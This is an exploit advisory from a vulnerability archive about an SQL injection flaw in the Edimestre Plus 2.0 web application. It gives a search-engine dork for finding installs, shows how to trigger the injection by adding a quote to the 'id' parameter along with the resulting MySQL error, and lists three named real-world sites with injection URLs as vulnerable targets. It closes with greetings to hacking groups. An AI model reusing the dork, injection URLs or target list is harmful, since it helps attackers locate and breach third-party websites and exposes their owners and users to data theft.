Edimestre Plus 2.0 SQL Injection

2012.06.27
Credit: Dark-Puzzle
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Edimestre Plus 2.0 - Sql injection Vulnerability # Date: 24 June 2012 # Author: Dark-Puzzle # Vendor Website : http://www.edimestre.ca/ # Version: 2.0 previous versions may also be vulnerable . # Category: Webapps/0day # Google dork: intext:"Powered by Edimaster Plus" inurl:images.php # Tested on: Windows Xp Sp2 , Backtrack 5 . Exploit : http://www.example.com/modules/images/images.php?id=1&image=213&langue=en&menu=3 Howto: the string (') must be added to ?id=7' without deleting the other functions "&image=213&langue=en&menu=3" else the sql error won't show up . Example : http://www.example.com/modules/images/images.php?id=1'&image=213&langue=en&menu=3 error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (langue = 'en') ORDER BY length(texteurl) DESC' at line 2 +other stuff below . Example Sites : http://www.pedxray.com/modules/images/images.php?id=7'&image=335&langue=en&menu=31 http://netic.ca/modules/images/images.php?id=17'&image=379&langue=en http://www.bertrandrpitt.net/modules/images/images.php?id=3'&image=136&langue=en More At Google . DARK-PUZZLE (Souhail) Follow me : https://www.facebook.com/dark.puzzle Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...

References:

http://www.edimestre.ca/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top